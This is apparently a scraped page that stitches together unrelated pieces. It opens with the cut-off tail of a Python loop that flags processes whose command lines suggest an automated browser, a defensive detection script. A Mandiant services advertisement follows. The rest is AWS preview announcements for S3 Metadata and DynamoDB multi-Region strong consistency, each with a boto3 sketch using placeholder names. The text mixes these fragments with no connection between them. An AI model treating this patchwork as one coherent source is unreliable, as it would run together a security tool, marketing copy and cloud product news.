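        if proc.info["pid"] in seen:
            continue
        if any(flag in cmdline for flag in SUSPICIOUS_FLAGS):
            seen.add(proc.info["pid"])
            print(f"Possible automated browser: {proc.info['name']} "
                  f"(PID {proc.info['pid']}): {cmdline}")
    time.sleep(5)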
Through numerous adversarial emulation engagements and Red Team and Purple Team assessments, Mandiant has gained an in-depth understanding of the unique paths attackers may take in compromising their targets. Review our Technical Assurance services and contact us for more information.
Amazon S3 Metadata is the easiest and fastest way to instantly discover and understand your S3 data, with automated, easily queried metadata that updates in near real time. This helps you curate, identify, and use your S3 data for business analytics, real-time inference applications, and more. S3 Metadata supports object metadata, which includes system-defined details like size and the source of the object, and custom metadata, which allows you to use tags to annotate your objects with information like product SKU, transaction ID, or content rating.
S3 Metadata is designed to automatically capture metadata from objects as they are uploaded into a bucket, and to make that metadata queryable in a read-only table. As data in your bucket changes, S3 Metadata updates the table within minutes to reflect the latest changes. These metadata tables are stored in S3 Tables, the new S3 storage offering optimized for tabular data. S3 Tables integration with AWS Glue Data Catalog is in preview, allowing you to stream, query, and visualize data—including S3 Metadata tables—using AWS Analytics services such as Amazon Data Firehose, Athena, Redshift, EMR, and QuickSight. Additionally, S3 Metadata integrates with Amazon Bedrock, allowing for the annotation of AI-generated videos with metadata that specifies its AI origin, creation timestamp, and the specific model used for its generation.
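As a hedged sketch of what querying a metadata table could look like via Athena with boto3: the database, table, and column names below are placeholders, not the service’s actual schema, so check the S3 Metadata documentation for the real table layout.

import boto3

athena = boto3.client("athena")

# Placeholder names: the metadata table is surfaced through the
# AWS Glue Data Catalog integration with S3 Tables (in preview).
response = athena.start_query_execution(
    QueryString="""
        SELECT key, size, last_modified_date
        FROM "s3_metadata_db"."my_bucket_metadata"
        ORDER BY last_modified_date DESC
        LIMIT 100
    """,
    QueryExecutionContext={"Database": "s3_metadata_db"},
    ResultConfiguration={"OutputLocation": "s3://my-athena-results/"},
)
print(response["QueryExecutionId"])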
Amazon S3 Metadata is currently available in preview in the US East (N. Virginia), US East (Ohio), and US West (Oregon) Regions, and coming soon to additional Regions. For pricing details, visit the S3 pricing page. To learn more, visit the product page, documentation, and AWS News Blog.
Starting today in preview, Amazon DynamoDB global tables now supports multi-Region strong consistency. DynamoDB global tables is a fully managed, serverless, multi-Region, and multi-active database used by tens of thousands of customers. With this new capability, you can now build highly available multi-Region applications with a Recovery Point Objective (RPO) of zero, achieving the highest level of resilience.
Multi-Region strong consistency ensures your applications can always read the latest version of data from any Region in a global table, removing the undifferentiated heavy lifting of managing consistency across multiple Regions. It is useful for building global applications with strict consistency requirements, such as user profile management, inventory tracking, and financial transaction processing.
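A hedged sketch of what a strongly consistent read might look like with boto3; the table and key are placeholders, and ConsistentRead is DynamoDB’s standard flag for strongly consistent reads, which this capability extends across Regions for global tables.

import boto3

# With multi-Region strong consistency enabled on the global table,
# a consistent read from any Region returns the latest committed write.
dynamodb = boto3.client("dynamodb", region_name="us-east-1")

response = dynamodb.get_item(
    TableName="user_profiles",            # placeholder global table
    Key={"user_id": {"S": "user-123"}},   # placeholder key
    ConsistentRead=True,                  # request a strongly consistent read
)
print(response.get("Item"))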
The preview of DynamoDB global tables with multi-Region strong consistency is available in the following Regions: US East (N. Virginia), US East (Ohio), and US West (Oregon). DynamoDB global tables with multi-Region strong consistency is billed according to existing global tables pricing. To learn more about global tables multi-Region strong consistency, see the preview documentation. For information about DynamoDB global tables, see the global tables information page and the developer guide.